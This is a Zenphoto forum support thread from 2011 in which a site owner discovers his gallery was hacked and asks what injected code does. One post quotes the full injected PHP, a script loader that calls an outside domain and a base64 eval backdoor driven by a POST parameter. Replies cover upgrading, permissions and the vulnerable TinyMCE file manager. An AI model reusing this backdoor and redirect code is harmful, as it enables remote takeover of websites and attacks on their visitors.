Zenphoto
The simpler media website CMS
ZenphotoThe simpler media website CMS
Forum search only. You might also want to search on the main site's user guide.
Your support helps pay for this server, and helps development of zenphoto. Thank you!
Visit the donations page
Comments
How do I see which files are missing?
This is what I see in the log.
I've no idea what any of this means
According to my investigation the index.php file has been modified a few hours later:
-rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
And the following is displayed in the error_log:
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
How do I see which files are missing?
This is what I see in the log.
I've no idea what any of this means
According to my investigation the index.php file has been modified a few hours later:
-rw-r--r-- 1 spoilert spoilert 7859 Nov 9 00:41 /home/spoilert/public_html/images/index.php
And the following is displayed in the error_log:
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
[09-Nov-2011 09:19:16] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/spoilert/public_html/images/index.php:1) in /home/spoilert/public_html/images/zp-core/functions.php on line 1729
How do I see which files are missing?
http://pastebin.com/XTdb6aBc
I don't know what any of that means
In my error log I see:
Cannot modify header information - headers already sent by (output started at /home/**************/index.php:1) in /home/***************/zp-core/functions.php on line 1729
I can't view or login to the site.
Any ideas before I re-upload?
Thanks.
So again: After every install or upgrade you are requested to delete the setup files, /zp-core/setup.php and /zp-core/setup (folder) for security reasons. With 1.4.2 it will even do this automatically. This is what you probably did. Setup always runs automacitally if the version changes. That happes for example if you upgrade (from nightly builds for example) or remove the htaccess file.
As said reupload the files and let setup run.
Addition: If you think your root index.php file has been modified and should not make sure your site/Server has not been hacked. We have currently a topic about that: http://www.zenphoto.org/support/topic.php?id=9939#post-58237
You're missing the point.
This was an Install that had not been changed for several weeks.
Literally overnight this problem occurred.
I've had to re-install Zen to get it to work this morning.
What I am worried about is why this happened with NO Modifications on my part whilst I was actually asleep.
Does Zen Autoupdate itself with no user interaction?
Looking at my index, album and image php files I see this code added to the top of each file.
--
global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }
--
What is this?
The code you posted proofs that apparently your site has been hacked. This might not have been Zenphoto fault, but a permissions issue. Best contact your host as well
However as the thread I linked above tell there was a security issue with the 3rd party file manager in 1.4.1.4 and older. Maybe they exploited that or not.
So I urge you to upgrade your site.
Looks like it must have been hacked.
I'm now on 1.4.1.5. Is that one secure?
Please contact your host as well as it might not have been Zenphoto's fault at all.
Do you have any idea what that code above does/did?
I'm now worried about using zen again after this
There are several possibilities Zenphoto cannot do anything about for example:
- The file/folder permissions were not correct (what setting did you have?)
- The server itself has been hacked
Also your browser or computer system could have been infected and someone got the ftp password that way.
All other php outside of zen are find.
Also I checked with the hosts and no Admin access with FTP or other was done since my last authorized upload yesterday. The files seem to have been updated via some SQL Injection (whatever that is).
Looks like something in zen 1.4.1.4 and below was insecure and hackers found a way in
Did you look at the zp-data folder? If permissions are not correct on that the config file might have been hacked (note setup tries to set the permissions but cannot do so always depending on server config.)
Which version was the original one on that site? Was that 1.4.1.4 or older?
I've upgraded now to 1.4.1.5
Permissions were all set correctly. It was a standard vanilla install.
Looking at the code that was injected into all php files it seems related to a bot attack via the tinymce
I'm careful with my sites and have not experienced something like this before.
I don't know if the theme has anything to do with it but I'm using zpgallerific_v1.4.1.
I re-installed the whole of Zenphoto to remove the hacked code.
Do you have other services on your server? You might want to check the php files of those services to see if they were hacked as well
As said on another thread several security sites had posted (and copied from each other as usual) this security site so maybe someone exploited that since naturally many people don't upgrade regulary.
Of course you can remove tinymce, it is just a plugin you should disable before doing so. You will then of course loose the texteditor and have to add everything manually via plain html code.
I've deleted tinymce (didn't use it anyway
I'll keep an eye on the server to make sure we don't get hit again.
When I reinstalled this site and brought up to date with 1.4.1.5 zenphoto found the following files which it suggested I remove but I don't know whether that's normal:
zp-core/tmp_2087833521026081.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/data.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/error_log
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/index.php
zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/class.images.php
zp-core/error_log
All files are correct except:
- "zp-core/tmp_2087833521026081.php" one, which is not generated by Zenphoto, might be a from your server.
- "zp-core/error_log" Don't know what that is, might be genrated by your server. Zenphoto stores its log with a suffix .txt within zp-data.
- "zp-core/zp-extensions/tiny_mce/plugins/ajaxfilemanager/inc/tmpphp.php" - is actually not a file that should be there.
Setup probably complains about the other because of the time stamp and "suggest" they might not be okay. It is not file compare.
Presumably with comments now disabled and me the only one accessing the site the TINYMCE issue shouldn't be a problem if I keep it enabled for my convenience.